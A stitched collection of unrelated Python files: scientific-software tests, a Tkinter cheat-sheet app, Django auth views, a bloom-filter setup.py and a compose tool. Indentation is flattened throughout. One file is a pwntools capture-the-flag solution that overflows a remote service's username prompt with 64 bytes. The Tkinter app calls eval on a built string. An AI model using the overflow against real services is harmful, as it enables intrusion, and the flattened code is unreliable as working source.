m.fs = FlowsheetBlock(default={"dynamic": False})
with pytest.raises(ConfigurationError,
match="water_props no solute_list or database was "
"defined. Users must provide at least one of these "
"arguments."):
m.fs.water_props = WaterParameterBlock()
@pytest.mark.component
def test_solute_list_from_database():
m = ConcreteModel()
db = Database()
m.fs = FlowsheetBlock(default={"dynamic": False})
m.fs.water_props = WaterParameterBlock(
default={"database": db})
assert m.fs.water_props.solute_set == db.get_solute_set()
@pytest.mark.component
def test_solute_list_with_database(caplog):
caplog.set_level(idaeslog.DEBUG, logger="watertap")
log = idaeslog.getLogger("idaes.watertap.core.zero_order_properties")
log.setLevel(idaeslog.DEBUG)
m = ConcreteModel()
db = Database()
m.fs = FlowsheetBlock(default={"dynamic": False})
m.fs.water_props = WaterParameterBlock(
default={"solute_list": ["A", "B", "tds"],
"database": db})
assert ("fs.water_props component A is not defined in the water_sources "
"database file.") in caplog.text
assert ("fs.water_props component B is not defined in the water_sources "
"database file.") in caplog.text
assert ("fs.water_props component tds is not defined in the water_sources "
"database file.") not in caplog.text
|
import numpy as np
import yt
import yt_idv
# Spherical Test (to line 20)
NDIM = 32
bbox = np.array(
[[0.0, 0.5], [np.pi / 8, 2 * np.pi / 8], [2 * np.pi / 8, 3 * np.pi / 8]]
)
fake_data = {"density": np.random.random((NDIM, NDIM, NDIM))}
ds = yt.load_uniform_grid(
fake_data, [NDIM, NDIM, NDIM], bbox=bbox, geometry="spherical",
)
rc = yt_idv.render_context(height=800, width=800, gui=True)
dd = ds.all_data()
dd.max_level = 1
sg = rc.add_scene(ds, ("index", "r"), no_ghost=True)
sg.camera.focus = [0.0, 0.0, 0.0]
rc.run()
# Cartesian Test (to line 25)
# ds = yt.load_sample("IsolatedGalaxy")
# rc = yt_idv.render_context(height=800, width=800, gui=True)
# sg = rc.add_scene(ds, "density", no_ghost=True)
# rc.run()
|
class SummaryData:
def __init__(self):
self.host=None
self.guests=None
pass
def setHost(self, host):
self.host = host
def setGuests(self, guests):
self.guests = guests
def toDict(self):
return dict(host=self.host.toDict() if self.host is not None else None,
guests=self.guests.toDict() if self.guests is not None else None)
def __str__(self):
return "SummaryData[hosts={}, guests={}]".format(str(self.host), str(self.guests)) |
# -*- coding: utf-8 -*-
# `loaddl` for "load data loader"
from .. import data
def load_data_loader(dl_type: str = "BP") -> type:
dl_name = dl_type + "DataLoader"
return getattr(data, dl_name)
|
from __future__ import absolute_import
from exam import fixture
from django.conf import settings
from django.core.urlresolvers import reverse
from sentry.testutils import TestCase
class JavaScriptSdkLoaderTest(TestCase):
@fixture
def path(self):
settings.JS_SDK_LOADER_SDK_VERSION = '0.5.2'
settings.JS_SDK_LOADER_DEFAULT_SDK_URL = 'https://s3.amazonaws.com/getsentry-cdn/@sentry/browser/%s/bundle.min.js'
return reverse('sentry-js-sdk-loader', args=[self.projectkey.public_key])
def test_noop_no_pub_key(self):
resp = self.client.get(reverse('sentry-js-sdk-loader', args=['abc']))
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/js-sdk-loader-noop.js.tmpl')
def test_noop(self):
settings.JS_SDK_LOADER_DEFAULT_SDK_URL = ''
resp = self.client.get(reverse('sentry-js-sdk-loader', args=[self.projectkey.public_key]))
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/js-sdk-loader-noop.js.tmpl')
def test_no_replace(self):
settings.JS_SDK_LOADER_SDK_VERSION = '0.5.2'
settings.JS_SDK_LOADER_DEFAULT_SDK_URL = 'https://s3.amazonaws.com/getsentry-cdn/@sentry/browser/0.0.0/bundle.min.js'
resp = self.client.get(reverse('sentry-js-sdk-loader', args=[self.projectkey.public_key]))
assert resp.status_code == 200
self.assertIn(settings.JS_SDK_LOADER_DEFAULT_SDK_URL, resp.content)
self.assertTemplateUsed(resp, 'sentry/js-sdk-loader.js.tmpl')
def test_renders_js_loader(self):
resp = self.client.get(self.path)
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/js-sdk-loader.js.tmpl')
self.assertIn(self.projectkey.public_key, resp.content)
self.assertIn('bundle.min.js', resp.content)
def test_minified(self):
resp = self.client.get(self.path)
assert resp.status_code == 200
min_resp = self.client.get(
reverse(
'sentry-js-sdk-loader',
args=[
self.projectkey.public_key,
'.min']))
assert min_resp.status_code == 200
self.assertTemplateUsed(min_resp, 'sentry/js-sdk-loader.min.js.tmpl')
self.assertIn(self.projectkey.public_key, min_resp.content)
self.assertIn('bundle.min.js', min_resp.content)
assert len(resp.content) > len(min_resp.content)
def test_headers(self):
resp = self.client.get(self.path)
assert resp.status_code == 200, resp
self.assertIn('*', resp['Access-Control-Allow-Origin'])
self.assertIn('stale-if-error', resp['Cache-Control'])
self.assertIn('stale-while-revalidate', resp['Cache-Control'])
self.assertIn('s-maxage', resp['Cache-Control'])
self.assertIn('max-age', resp['Cache-Control'])
self.assertIn('project/%s' % self.projectkey.project_id, resp['Surrogate-Key'])
self.assertIn('sdk/%s' % settings.JS_SDK_LOADER_SDK_VERSION, resp['Surrogate-Key'])
self.assertIn('sdk-loader', resp['Surrogate-Key'])
assert 'Content-Encoding' not in resp
assert 'Set-Cookie' not in resp
assert 'Vary' not in resp
def test_absolute_url(self):
assert reverse(
'sentry-js-sdk-loader',
args=[
self.projectkey.public_key,
'.min']) in self.projectkey.js_sdk_loader_cdn_url
settings.JS_SDK_LOADER_CDN_URL = 'https://js.sentry-cdn.com/'
assert 'https://js.sentry-cdn.com/%s.min.js' % (
self.projectkey.public_key == self.projectkey.js_sdk_loader_cdn_url
)
|
from pwn import *
io = remote("13.37.111.222", "5000")
#io = process("./challenge_1")
payload = b""
payload += b"A"*64
io.sendlineafter("username:", payload)
io.interactive()
# FLAG: CN{finding_boundaries_is_never_easy}
|
#coding: latin1
from algoritmia.problems.puzzles.nqueens.backtracking1 import NQueensEnumerator#[full
from algoritmia.problems.puzzles.nqueens.backtracking1 import NQueensStateSpace1
solver = NQueensEnumerator()
for n in range(1, 9):
space = NQueensStateSpace1(n)
print("Soluciones con {} reina{}:".format(n, 's'*(n>1)), end=" ")
for queens in solver.enumerate(space):
print(queens, end=" ")
print() #]full
|
import setuptools
with open("PYPI.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="bloomy",
version="0.0.2",
author="Sam Crochet",
author_email="samuel.d.crochet@gmail.com",
description="An efficient and scalable bloom filter module built in pure python.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/shmam/bloomy",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
) |
from datetime import datetime, timedelta
from typing import Union
class SatDatetime:
@staticmethod
def get_from_datetime(date):
delta = date - datetime(2017, 12, 25)
convert = (delta.days + (delta.seconds + delta.microseconds / 1000000) / 86400) / 7 * 20
return SatDatetime(convert)
def __init__(self,
year: float, month: float = 1, day: float = 1,
hour: float = 0, minute: float = 0, second: float = 0):
minute += second / 60
hour += minute / 60
day += -1 + hour / 24
month += -1 + day / 22
year += month / 8
self.year = 1
self.month = 1
self.day = 1
self.hour = 0
self.minute = 0
self.second = 0.0
self.refresh_by_year(year)
def __copy__(self):
return SatDatetime(self.year, self.month, self.day, self.hour, self.minute, self.second)
def __str__(self):
""" A user-friendly string representation of SatTimedelta. """
return f'{self.year}. {self.month}. {self.day:02d}. {self.hour:02d}:{self.minute:02d}:{self.second:09.6f}'
def __repr__(self):
""" A programmer-friendly string representation of SatTimedelta. """
return f'SatDatetime({self.year}, {self.month}, {self.day}, {self.hour}, {self.minute}, {self.second})'
def __add__(self, other: 'SatTimedelta') -> 'SatDatetime':
""" Adds SatTimedelta object from self and returns new SatTimedelta object. """
if isinstance(other, SatTimedelta):
return SatDatetime(self.year + other.years, self.month + other.months, self.day + other.days,
self.hour + other.hours, self.minute + other.minutes, self.second + other.seconds)
else:
raise TypeError(f'SatDatetime can only be added to SatTimedelta, not {type(other)}')
def __sub__(self, other: 'SatTimedelta') -> 'SatDatetime':
""" Subtracts SatTimedelta object from self and returns new SatTimedelta object. """
if isinstance(other, SatTimedelta):
return SatDatetime(self.year - other.years, self.month - other.months, self.day - other.days,
self.hour - other.hours, self.minute - other.minutes, self.second - other.seconds)
else:
raise TypeError(f'SatDatetime can only be subtracted from SatTimedelta, not {type(other)}')
def __mul__(self, other: float) -> 'SatDatetime':
""" Multiplies SatTimedelta object by float and returns new SatTimedelta object. """
return SatDatetime(self.year * other, self.month * other, self.day * other,
self.hour * other, self.minute * other, self.second * other)
def __truediv__(self, other: float) -> 'SatDatetime':
""" Divides SatTimedelta object by float and returns new SatTimedelta object. """
return SatDatetime(self.year / other, self.month / other, self.day / other,
self.hour / other, self.minute / other, self.second / other)
def __lt__(self, other: 'SatDatetime') -> bool:
return self.get_on_year() < other.get_on_year()
def __le__(self, other: 'SatDatetime') -> bool:
return self.get_on_year() <= other.get_on_year()
def __eq__(self, other: 'SatDatetime') -> bool:
return self.get_on_year() == other.get_on_year()
def __ne__(self, other: 'SatDatetime') -> bool:
return self.get_on_year() != other.get_on_year()
def __gt__(self, other: 'SatDatetime') -> bool:
return self.get_on_year() > other.get_on_year()
def __ge__(self, other: 'SatDatetime') -> bool:
return self.get_on_year() >= other.get_on_year()
def refresh_by_year(self, year):
year, month = int(year), (year - int(year)) * 8
month, day = int(month) + 1, (month - int(month)) * 22
day, hour = int(day) + 1, (day - int(day)) * 24
hour, minute = int(hour), (hour - int(hour)) * 60
minute, second = int(minute), (minute - int(minute)) * 60
self.year = year
self.month = month
self.day = day
self.hour = hour
self.minute = minute
self.second = second
def get_on_year(self):
minute = self.minute + self.second / 60
hour = self.hour + minute / 60
day = self.day - 1 + hour / 24
month = self.month - 1 + day / 22
year = self.year + month / 8
return year
def to_datetime(self):
c = self.get_on_year()
days_plus = c / 20 * 7
return datetime(2017, 12, 25) + timedelta(days=days_plus)
class SatTimedelta:
def __init__(self,
years: float = 0, months: float = 0, days: float = 0,
hours: float = 0, minutes: float = 0, seconds: float = 0):
self.years = years
self.months = months
self.days = days
self.hours = hours
self.minutes = minutes
self.seconds = seconds
seconds = self.get_in_seconds()
self.years = seconds // 15206400
seconds -= self.years * 15206400
self.months = seconds // 1900800
seconds -= self.months * 1900800
self.days = seconds // 86400
seconds -= self.days * 86400
self.hours = seconds // 3600
seconds -= self.hours * 3600
self.minutes = seconds // 60
seconds -= self.minutes * 60
self.seconds = seconds
def __str__(self):
return f'{self.days + self.months * 22 + self.years * 176:d} days, ' \
f'{self.hours:d} hours {self.minutes:d} minutes {self.seconds} seconds'
def __repr__(self):
return f'SatTimedelta({self.years}, {self.months}, {self.days}, {self.hours}, {self.minutes}, {self.seconds})'
def __add__(self, other: 'SatTimedelta') -> Union['SatTimedelta', SatDatetime]:
if isinstance(other, SatTimedelta):
return SatTimedelta(self.years + other.years, self.months + other.months, self.days + other.days,
self.hours + other.hours, self.minutes + other.minutes, self.seconds + other.seconds)
elif isinstance(other, SatDatetime):
return SatDatetime(self.years + other.year, self.months + other.month, self.days + other.day,
self.hours + other.hour, self.minutes + other.minute, self.seconds + other.second)
else:
raise TypeError(f'SatTimedelta can only be added to SatTimedelta or SatDatetime, not {type(other)}')
def __sub__(self, other: 'SatTimedelta') -> 'SatTimedelta':
if isinstance(other, SatTimedelta):
return SatTimedelta(self.years - other.years, self.months - other.months, self.days - other.days,
self.hours - other.hours, self.minutes - other.minutes, self.seconds - other.seconds)
else:
raise TypeError(f'SatTimedelta can only be subtracted from SatTimedelta, not {type(other)}')
def __mul__(self, other: float) -> 'SatTimedelta':
return SatTimedelta(self.years * other, self.months * other, self.days * other,
self.hours * other, self.minutes * other, self.seconds * other)
def __truediv__(self, other: float) -> 'SatTimedelta':
return SatTimedelta(self.years / other, self.months / other, self.days / other,
self.hours / other, self.minutes / other, self.seconds / other)
def __floordiv__(self, other: float) -> 'SatTimedelta':
return SatTimedelta(self.years // other, self.months // other, self.days // other,
self.hours // other, self.minutes // other, self.seconds // other)
def get_in_seconds(self):
return self.seconds \
+ self.minutes * 60 \
+ self.hours * 3600 \
+ self.days * 86400 \
+ self.months * 1900800 \
+ self.years * 15206400
def get_in_years(self) -> float:
return self.get_in_seconds() / 15206400
if __name__ == '__main__':
pass
|
import tkinter as tk
import time
import os
from ctypes import windll
import examples as exs
import tkinter.messagebox
windll.shcore.SetProcessDpiAwareness(1)
class Window:
def __init__(self, title, size):
self.root = tk.Tk()
# Setting window title
self.root.title(title)
#Setting window size
self.root.geometry("{}x{}".format(size[0], size[1]))
# Default variable values
self.style_sheet = {"__none__": {}} # Handles all the widget styling
self.menus = {} # Stores all the menus (tk Frames)
self.shortcuts = {} # Stores all the keyboard shortcuts
self.lastIteration = 0 # Stores the last time the Loop method was called to allow constant frame rate
self.frame_rate = 15 # Stores frame rate, default = 15 fps
self.process = True # Stores if window is still open
self.widgets = {} # Stores the widgets
self.current_menu = self.addMenu("root") # Creates the default menu
self.images = {}
# Change self.process value on window close
self.root.protocol("WM_DELETE_WINDOW", self.close_handler)
self.onStart()
# FUNCTIONS TO BE CREATED BY USER ===>
def onStart(self):
pass
def update(self):
pass
def checkInputs(self):
pass
# <===
# Load all the images in a folder
def loadImagesFromFolder(self, directory):
allowed = [".png", ".jpg", ".PNG", ".gif"]
for filename in os.listdir(directory):
for suf in allowed:
if filename.endswith(suf):
self.images.update({filename.replace(suf, ""): tk.PhotoImage(file=os.path.join(directory, filename))})
break
# Changes the current menu
def goToMenu(self, menu):
# self.current_menu.lower()
tk.Misc.lower(self.current_menu)
self.current_menu = self.menus[menu]
# self.current_menu.lift()
tk.Misc.lift(self.current_menu)
# Adds a menu to the window
def addMenu(self, name, autoplace = True, canvas = False, style = "__none__", **kwargs):
arguments = dict(self.style_sheet[style], **kwargs)
# Check if shoud create canvas or frame
frame = tk.Frame(self.root, arguments) if not canvas else tk.Canvas(self.root, arguments)
self.menus.update({name: frame})
if autoplace:
frame.place(relx=0, rely=0, relwidth=1, relheight=1)
return frame
# Gets called when the user presses the close button
def close_handler(self):
self.process = False
self.root.destroy()
# Adds a keyboard shortcut to the app
def addShortcut(self, keySym, command, widget = False):
binder = widget if widget != False else self.root
binder.bind(keySym, command)
# Adds a widget to the window
def addWidget(self, menu, name, cls, style = "__none__", **kwargs):
arguments = dict(self.style_sheet[style], **kwargs)
widget = cls(self.menus[menu], arguments)
self.widgets.update({name: widget})
return widget
# Retrieves the styling from the stylesheet
def getStyling(self, style):
return style if isinstance(style, dict) else self.style_sheet[style]
# Allows for shorter syntax in the code when placing a widget with a tuple of size and position
def place(self, name, tup, isMenu = False):
widget = self.widgets[name] if not isMenu else self.menus[name]
widget.place(relx=tup[0], rely=tup[1], relwidth=tup[2], relheight=tup[3])
# Load a style sheet for the app
def addStyleSheet(self, path, separate_tags = False):
if separate_tags:
self.style_sheet, self.tags = loadStyleSheet(path, separate_tags)
else:
self.style_sheet = loadStyleSheet(path, False)
def Loop(self):
# Get constant frame rate by checking last iteration
if time.time() - self.lastIteration < 1/self.frame_rate:
time.sleep(1/self.frame_rate - (time.time() - self.lastIteration))
self.lastIteration = time.time()
# Update the window and canvas if there is one
self.checkInputs()
self.update()
class CheatSheet(Window):
def onStart(self):
# Setting up the window's properties
self.root.resizable(False, False)
self.root.iconbitmap("assets/icons/icon.ico")
self.addStyleSheet('style.txt', True)
# Setting up the different categories
self.categories = ["EVENTS LIST", "WIDGET LIST", "WIDGET\nPROPERTIES"]
self.loadImagesFromFolder("assets")
self.loadImagesFromFolder("assets/CodeExamples")
self.current_article = 0
exs.setupMaster(self.root)
# Setting up the different menus
# Navigation frame
self.addMenu("nav", False, False, "nav_s")
self.place("nav", (0.80, 0.15, 0.20, 0.85), True)
# Adding all the navigation buttons
for i, category in enumerate(self.categories):
self.addWidget("nav", "navBtn" + str(i), tk.Button, "navBtn_s", text=category, command=lambda x=i: self.goToArticle(x + 1))
self.place("navBtn" + str(i), (0, i*1/len(self.categories), 1, 1/len(self.categories) - 0.002))
# Header frame
self.addMenu("head", False, False, "head_s")
self.place("head", (0, 0, 1, 0.15), True)
self.addWidget("head", "titleMain", tk.Label, "titleMain_s", text="TKINTER CHEAT SHEET")
self.place("titleMain", (0, 0, 1, 1))
self.addWidget("head", "homeBtn", tk.Button, "homeBtn_s", image=self.images['home_icon'], command=lambda: self.goToArticle(0))
self.place("homeBtn", (0.9, 0.2, 0.1, 0.6))
# Default Main
self.addMenu("article0", False, True, "article_s", scrollregion=(0,0,2000,800))
self.place("article0", (0, 0.15, 0.8, 1), True)
# Get the canvas dimensions
self.root.update()
self.can_w, self.can_h = self.menus["article0"].winfo_width(), self.menus["article0"].winfo_height()
self.addWidget("article0", "article0img", tk.Label, image=self.images["article0"])
self.menus["article0"].create_window(self.can_w/2, self.can_h/2.15, window=self.widgets["article0img"])
# Mouse Wheel Event
self.menus["article0"].bind_all("<MouseWheel>", self.onMousewheel)
# Creating all the articles
self.setupArticle1()
self.setupArticle2()
self.setupArticle3()
self.goToMenu("article0")
def onMousewheel(self, event):
self.current_menu.yview_scroll(int(-1*(event.delta/120)), "units")
def goToArticle(self, i):
self.current_article = i
self.goToMenu("article" + str(i))
no_scroll_articles = [0, 3]
if not i in no_scroll_articles:
self.resetScrollBar()
def resetScrollBar(self):
# Scroll Bar setup
if "scrollbar" in self.widgets:
self.widgets["scrollbar"].destroy()
self.addWidget("article" + str(self.current_article), "scrollbar", tk.Scrollbar, orient="vertical", command=self.menus["article0"].yview)
self.place("scrollbar", (0.973, 0, 0.025, 1*0.85))
self.current_menu.config(yscrollcommand=self.widgets["scrollbar"].set)
self.current_menu.bind_all("<MouseWheel>", self.onMousewheel)
self.widgets["scrollbar"].config(command=self.current_menu.yview)
def runExampleSeeCode(self, func, name):
# Setting up window
top = tk.Toplevel(self.root)
top.geometry("800x550")
top.title("Code Example")
top.resizable(False, False)
top.iconbitmap("assets/icons/icon.ico")
# Adding widgets to the window
background = tk.Label(top, image=self.images["ex_background1"])
background.place(relx=0, rely=0, relwidth=1, relheight=1)
code = tk.Label(top, image=self.images[name], bg="#37474f")
code.place(relx=0, rely=0.2, relwidth=1, relheight=0.8)
top.bind("<Button-1>", lambda x: self.callfuncbtn(x, (690, 10, 780, 70), func))
def callfuncbtn(self, event, rect, func):
if event.x > rect[0] and event.x < rect[2] and event.y > rect[1] and event.y < rect[3]:
if isinstance(func, str):
eval(func + "()")
else:
func()
def get_attributes(self, widget):
widg = widget
keys = widg.keys()
properties = {}
for key in keys:
value = widg[key] if widg[key] else 'N/A'
vtype = str(type(value))
# Formatting the type
vtype = vtype.replace("<class '", "").replace("'>", "")
vtype = vtype.replace("_tkinter.Tcl_Obj", "TCL Object").replace("tkinter.Menu", "Menu").replace("int", "Integer").replace("str", "String")
properties.update({key: [value, vtype]})
# Creating properties window
top = tk.Toplevel(self.root)
top.geometry("800x550")
top.title("Widget Properties")
top.resizable(False, False)
top.iconbitmap("assets/icons/icon.ico")
# Adding header
head = tk.Label(top, text="This is the title lolz")
head.place(relx=0, rely=0, relwidth=1, relheight=0.2)
# Adding listbox
maxheight = 50*len(properties.keys()) + 450
canv = tk.Canvas(top, scrollregion=(0, 0, 800, maxheight))
canv.place(relx=0, rely=0, relwidth=1, relheight=1)
sb = tk.Scrollbar(top, orient="vertical")
sb.pack(side="right", fill="y")
canv.config(yscrollcommand=sb.set)
sb.config(command=canv.yview)
canv.create_image((400, 2500), image=self.images["prop_win_main"])
for i ,key in enumerate(properties.keys()):
canv.create_image((400, 190+i*55), image=self.images["prop_win_prop"])
canv.create_text(85, 190+i*55, text=key, font="Verdana 10",anchor="w", fill="#299200")
canv.create_text(505, 190+i*55, text=properties[key][1], font="Verdana 8",anchor="e", fill="#0c7cba")
canv.create_text(550, 190+i*55, text=properties[key][0], font="Verdana 8",anchor="w", fill="#0c7cba")
canv.create_text(350, 65, text=widget.winfo_class(), anchor="w", font="Verdana 20 bold", fill="#19967d")
widget.destroy()
def setupArticle1(self):
self.addMenu("article1", False, True, "article_s", scrollregion=(0,0,1000,6000))
self.place("article1", (0, 0.15, 0.8, 1), True)
self.addWidget("article1", "article1img", tk.Label, image=self.images["article1"])
self.menus["article1"].create_window(self.can_w/2, self.can_h*3.6, window=self.widgets["article1img"])
self.addWidget("article1", "trybtn1-1", tk.Button, "try_it_btn_s", command = exs.one_1)
self.menus["article1"].create_window(118, 800, window=self.widgets["trybtn1-1"])
self.addWidget("article1", "trybtn1-2", tk.Button, "try_it_btn_s", command = exs.one_2)
self.menus["article1"].create_window(118, 5628, window=self.widgets["trybtn1-2"])
def setupArticle2(self):
self.addMenu("article2", False, True, "article_s", scrollregion=(0,0,1000,4150))
self.place("article2", (0, 0.15, 0.8, 1), True)
self.addWidget("article2", "article2img", tk.Label, image=self.images["article2"])
self.menus["article2"].create_window(self.can_w/2, self.can_h*2.5, window=self.widgets["article2img"])
btn_positions = [1495, 1590, 1685, 2040, 2130, 2220, 2590, 2675, 2765, 2900, 3030, 3120, 3205, 3335, 3570, 3660, 3790, 3920]
for i, pos in enumerate(btn_positions):
self.addWidget("article2", "trybtn2-" + str(i+1), tk.Button, image=self.images["seeExBtn"], highlightthickness=0, bd=0, command=lambda x=i: self.runExampleSeeCode("exs.two_{}".format(x+1), "2_{}".format(x+1)))
self.menus["article2"].create_window(1000, pos, window=self.widgets["trybtn2-" + str(i+1)])
def setupArticle3(self):
self.addMenu("article3", False, True, "article_s", scrollregion=(0,0,1000,800))
self.place("article3", (0, 0.15, 0.8, 1), True)
self.addWidget("article3", "article3img", tk.Label, image=self.images["article3"])
self.menus["article3"].create_window(self.can_w/2, self.can_h/2.35, window=self.widgets["article3img"])
self.widgets["article3img"].bind("<Button-1>", self.buttonGridCallBack)
def buttonGridCallBack(self, event):
init_y = 241
hz = [178, 665]
w, h = 412, 45
widgets = [[tk.Frame, tk.LabelFrame, tk.Canvas, tk.Label, tk.Message, tk.Text, tk.Button, tk.Entry, tk.Listbox], [tk.Menubutton, "OptionMenu", tk.Checkbutton, tk.Radiobutton, tk.Spinbox, "Tk", tk.Menu, tk.Toplevel, tk.PanedWindow]]
for i in range(2):
for j in range(9):
if event.x > hz[i] and event.x < hz[i] + w and event.y > init_y + h*j and event.y < init_y + h*(j+1):
# Handling some problematic cases
if widgets[i][j] == "Tk":
tkinter.messagebox.showinfo("Widget Properties", "The Tk widget does not have any properties !\nIts attributes are set using methods such as geometry or title.\n To learn more about those, read the 'Tkinter Functions' part.")
elif widgets[i][j] == "OptionMenu":
v = tk.StringVar(self.root)
self.get_attributes(tk.OptionMenu(self.root, v, "0", "1", "2"))
else:
self.get_attributes(widgets[i][j](self.root))
def openCheatSheet():
cs = CheatSheet("Tkinter Cheat Sheet", (1400, 800))
cs.root.mainloop()
def loadStyleSheet(path, separate_tags):
style_sheet = {}
tags_dict = {}
# Opening file
with open(path, "r") as css_file:
file_string = css_file.read()
file_string = file_string.replace("\n", "")
file_string = file_string.replace("}", "{")
# Getting all the css class names and properties as array elements
file_array = file_string.split("{")
for k in range(int(len(file_array) / 2)):
# Getting the css class name
name = file_array[2*k].strip(" ")
properties = file_array[2*k+1]
# Formatting the properties into a dictionnary
properties = properties.split(";")
prop_dict = {}
# Looping through all the properties of the class
for property_ in properties:
if not property_.strip(" ") == "":
# Getting the name and values
property_name, property_val = property_.split(":")
# Setting up tags
# Formatting the name and values
property_name = property_name.strip(" ")
property_val = property_val.strip(" ")
# Updating the class dictionary
if property_name[0:3] == "t__" and separate_tags:
tags_dict.update({property_name.strip("t__"): property_val})
else:
prop_dict.update({property_name: property_val})
style_sheet.update({name: prop_dict})
# Adding null value to the style sheet
style_sheet.update({"__none__": {}})
return style_sheet if not separate_tags else style_sheet, tags_dict
def helloworld():
print("hello world")
if __name__ == "__main__":
openCheatSheet()
|
__all__ = ['utilities']
from .utilities import set_credentials, set_destination, notify_when_done
|
from django.shortcuts import render, redirect
from django.contrib.auth import login, authenticate, logout
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.contrib.auth.models import User
from posts.forms import PostForm
from posts.models import Post, Follow
from .models import Profile, Gender
from .forms import CustomUserCreationForm, ProfileForm
from .email import send_welcome_email
# Create your views here.
def loginUser(request):
if request.user.is_authenticated:
return redirect('explore')
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
try:
user = User.objects.get(username=username)
except:
messages.error(request, 'Username does not exist')
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
return redirect('explore')
else:
messages.error(request, 'Username or password is incorrect')
context = {'page': 'login'}
return render(request, 'users/login_register.html', context)
def logoutUser(request):
logout(request)
messages.info(request, 'User was logged out!')
return redirect('login')
def registerUser(request):
form = CustomUserCreationForm()
if request.method == 'POST':
name = request.POST['first_name']
email = request.POST['email']
form = CustomUserCreationForm(request.POST)
if form.is_valid():
user = form.save(commit=False)
user.username = user.username.lower()
user.save()
messages.success(request, 'User account was created')
send_welcome_email(name, email)
login(request, user)
return redirect('edit-profile')
else:
messages.error(
request, 'An error has occured during registration!')
return render(request, 'users/login_register.html')
@login_required(login_url='login')
def userProfile(request, pk):
user = User.objects.get(id=pk)
profile = user.profile
status = Follow.objects.filter(followee=profile.user, follower=request.user).count()
context = {
'profile': profile,
'uploadForm': PostForm(),
'posts': Post.objects.filter(user=request.user),
'status':status,
'followee_followers_count': Follow.objects.filter(followee=user).count(),
'followee_following_count': Follow.objects.filter(follower=user).count(),
'user_followers_count': Follow.objects.filter(followee=request.user).count(),
'user_following_count': Follow.objects.filter(follower=request.user).count(),
}
return render(request, 'users/profile.html', context)
@login_required(login_url='login')
def editProfile(request):
profile = request.user.profile
form = ProfileForm(instance=profile)
if request.method == 'POST':
form = ProfileForm(request.POST, request.FILES, instance=profile)
if form.is_valid():
form.save()
return redirect('profile', request.user.id)
context = {
'form': form,
'profile': profile,
'uploadForm': PostForm(),
}
return render(request, 'users/profile_form.html', context)
|
# flank.py
#
# Author: Jan Piotr Buchmann <jan.buchmann@sydney.edu.au>
# Description:
#
# Version: 0.0
import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '../'))
import lib.sequence.sequence
import extensions.extension
class BlastData:
def __init__(self):
self.start = 0
self.stop = 0
self.strand = "Plus"
def update(self, start, stop, strand):
self.start = int(start)
self.stop = int(stop)
self.strand = strand
class Flank:
def __init__(self, ctg, side):
self.contig = ctg
self.length = ctg.flank_len
self.side = side
self.name = "{}_{}".format(self.contig.name, self.side)
self.start = 0
self.stop = 0
self.ref_overlap = 5
self.qry_overlap = 20
self.shift = 0
self.extension = extensions.extension.Extension(self)
self.calculate_coordinates()
self.blast_data = BlastData()
def has_extension(self):
if self.extension.length == 0:
return False
return True
def is_extended(self, alignment):
raise NotImplementedError("Require check_overlap() implementation")
def get_fasta_sequence(self):
raise NotImplementedError("Require get_fasta_sequence() implementation")
def calculate_coordinates(self, contig):
raise NotImplementedError("Require calculate_coordinates() implementation")
def show(self):
print("\t{}\t{} :\t{}\t{}\t{}\t{}".format(self.side,
self.name,
self.start,
self.stop,
self.length,
self.shift))
|
class Subtraction:
@staticmethod
def difference(minuend, subtraend):
return minuend - subtraend |
from scheme_runner import Query, SchemeTestCase
def balanced(code):
return sum(x.count("(") - x.count(")") for x in code) == 0
def decode(filename: str):
if not filename.endswith(".scm"):
filename += ".scm"
with open(filename) as f:
contents = str(f.read())
groups = {}
curr_case = None
for line in contents.split("\n"):
line = line.strip()
if not line:
continue
elif line.startswith(";;; group>"):
curr_case = SchemeTestCase([])
groups[line.split("group>", 1)[1]] = curr_case
elif line.startswith(";"):
if not line.startswith("; expect"):
continue # useless comments
expect_str = line.split("; expect")[1]
curr_case.queries[-1].expected["out"] = \
[curr_case.queries[-1].expected.get("out", [""])[0]
+ "".join(x.strip() + "\n" for x in expect_str.split(";"))]
elif curr_case.queries and not balanced(curr_case.queries[-1].code):
curr_case.queries[-1].code.append(line)
else:
curr_case.queries.append(Query([line], {}))
print(groups)
for group in groups:
filename = f"scm_tests/case_{group.strip().lower().replace(' ', '-')}.py"
with open(filename, "w") as f:
f.write("")
def write(x):
print(x)
with open(filename, "a") as f:
f.write(x + "\n")
write("from scheme_runner import SchemeTestCase, Query")
write("cases = [")
write(repr(groups[group]))
write("]")
if __name__ == '__main__':
print("# stdout is a viable test file")
decode(input("# input filename: "))
|
import errno
import glob
import os
from rhcephcompose import Comps, Variants
from rhcephcompose import gather
from rhcephcompose import metadata
from rhcephcompose.gather import chacra
from rhcephcompose.gather import koji
from rhcephcompose.log import log
from shutil import copy
import subprocess
import textwrap
import time
COMPOSE_TYPE_MAP = {
'production': '',
'nightly': '.n',
'test': '.t',
'ci': '.ci',
}
class Compose(object):
"""
A "compose" is a particular "spin" or "release" . It is a collection
of repositories.
"""
def __init__(self, conf):
""" This constructor simply stores all our settings; it takes no
actions. See run() for that. """
# Build lists are normally in the Errata Tool or a Brew tag. There's
# no support for Ubuntu builds in Brew or the Errata Tool today, so I
# just list each build in text files. The "builds" dict here contains
# a text file for each distro.
self.builds = conf['builds']
# In Pungi terminology, assume gather_source "comps" (see also
# Pungi's "comps_file".)
self.comps = conf['comps']
# Variants file copied directly from what we use with Pungi on
# RHEL.
self.variants_file = conf['variants_file']
# Set koji_profile or chacra_url.
self.koji_profile = conf.get('koji_profile')
self.chacra_url = conf.get('chacra_url')
self.chacra_ssl_verify = conf.get('chacra_ssl_verify', True)
# Lookaside cache location.
# See freedesktop.org spec for XDG_CACHE_HOME
try:
xdg_cache_home = os.environ['XDG_CACHE_HOME']
except KeyError:
xdg_cache_home = os.path.expanduser('~/.cache')
self.cache_path = os.path.join(xdg_cache_home, 'rhcephcompose')
# Output target directory
self.target = conf['target']
# Short name, eg "RHCEPH"
self.release_short = conf['release_short']
# Release version, eg "1.3"
try:
self.release_version = conf['release_version']
